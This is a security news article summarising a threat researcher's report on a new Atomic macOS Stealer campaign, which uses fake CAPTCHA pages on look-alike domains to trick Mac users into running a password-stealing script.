New Apple Passwords Attack Confirmed — What You Need To Know

New macOS password attack hits Apples users.
Although it is far more commonplace to read about password attacks against users of the Windows operating system, or targeting services such as Gmail, the truth of the matter is that nobody is safe from the credential-theft threat as this newly confirmed Apple password-stealing attack illustrates. Here’s what you need to know about the AMOS campaign targeting macOS users.
What You Need To Know About The AMOS Apple Passwords Attack
The latest adversary intelligence report from Koushik Pal, a threat researcher at CloudSEK, has warned users that a newly identified Atomic macOS stealer campaign utilizing a previously unknown variant has been observed targeting the Apple operating system.
Although this latest and ongoing threat leverages well-known existing tactics and techniques, such as the Clickfix fake CAPTCHA screen and multi-platform social engineering, the danger it poses to macOS users remains high nonetheless.
Better known as AMOS, this latest variant of the Atomic macOS Stealer has been observed using Clickfix attack sites that impersonate a U.S. support services company within the cable TV, internet provision, mobile phone, and managed services sectors. The brand impersonation in this case is made possible by way of typo-squatting domains that appear similar to the genuine article.
“The macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” Pal warned. This script then uses native macOS commands to “harvest credentials, bypass security mechanisms, and execute malicious binaries.” This is, to be fair, as significant a threat to your Apple passwords as you are going to get.
Targeting both consumer and corporate users, and highlighting a trend in such multi-platform social engineering attacks, Pal said that source code comments suggested that Russian-speaking cybercriminals are behind the new AMOS threat campaign.
The AMOS malware utilises legitimate utilities to circumvent endpoint security controls and extract macOS user passwords, which can then be used for lateral movement or sold to initial access brokers for use in other cybercriminal campaigns, including ransomware attacks.
Users should be educated about the tactics used by such Apple passwords-stealing campaigns, Pal recommended by way of mitigation, “especially those disguised as system verification prompts.”